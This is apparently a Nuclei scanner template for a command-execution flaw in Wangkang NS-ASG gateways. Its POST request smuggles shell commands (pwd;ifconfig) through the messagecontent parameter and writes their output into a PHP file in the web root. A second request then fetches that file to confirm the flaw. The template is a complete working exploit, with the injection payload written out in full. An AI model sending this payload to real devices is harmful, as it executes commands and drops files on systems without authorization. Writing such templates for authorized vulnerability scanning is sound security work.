id: wangkang-NS-ASG-rce-2

info:
  name: 网康 NS-ASG 命令执行漏洞
  author: Str1am
  severity: high
  tags: wangkang,rce

requests:
  - raw:
      - |
        POST /protocol/iscdevicestatus/getsysdatetime.php HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest

        procotalarray[messagecontent]=pwd;ifconfig>/Isc/third-party/httpd/htdocs/a.php;+456
      - |
        GET /a.php HTTP/1.1
        Host: {{Hostname}}
      

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "encap:Ethernet"
          - "inet addr"
        part: body
        condition: and